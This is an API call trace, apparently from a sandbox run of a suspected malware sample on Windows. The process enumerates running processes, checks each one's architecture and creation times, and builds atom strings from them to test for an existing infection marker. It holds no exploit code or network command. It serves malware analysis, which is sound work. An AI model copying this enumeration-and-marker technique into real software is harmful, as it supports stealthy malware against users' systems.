	[0096.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.757] CloseHandle (hObject=0x248) returned 1
	[0096.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.757] CloseHandle (hObject=0x248) returned 1
	[0096.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658f28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.758] CloseHandle (hObject=0x248) returned 1
	[0096.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.758] CloseHandle (hObject=0x248) returned 1
	[0096.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x6590a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.758] CloseHandle (hObject=0x248) returned 1
	[0096.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x6589e8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.759] CloseHandle (hObject=0x248) returned 1
	[0096.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.759] CloseHandle (hObject=0x248) returned 1
	[0096.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.760] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.761] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.761] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.761] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.762] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetLastError () returned 0x5
	[0096.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.764] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.764] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.764] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.764] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.764] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.764] CloseHandle (hObject=0x248) returned 1
	[0096.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.765] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.765] CloseHandle (hObject=0x248) returned 1
	[0096.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65aca8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.765] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.765] CloseHandle (hObject=0x248) returned 1
	[0096.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x166d8) returned 0xc0000004
	[0096.807] VirtualAlloc (lpAddress=0x0, dwSize=0x167d8, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x167d8, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65acd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.811] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.812] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.813] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.813] CloseHandle (hObject=0x248) returned 1
	[0096.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658f68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.814] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.814] CloseHandle (hObject=0x248) returned 1
	[0096.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.815] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.815] CloseHandle (hObject=0x248) returned 1
	[0096.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.815] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.815] CloseHandle (hObject=0x248) returned 1
	[0096.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.815] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.815] CloseHandle (hObject=0x248) returned 1
	[0096.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.816] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.816] CloseHandle (hObject=0x248) returned 1
	[0096.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658dc8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.816] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.816] CloseHandle (hObject=0x248) returned 1
	[0096.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.816] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.816] CloseHandle (hObject=0x248) returned 1
	[0096.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
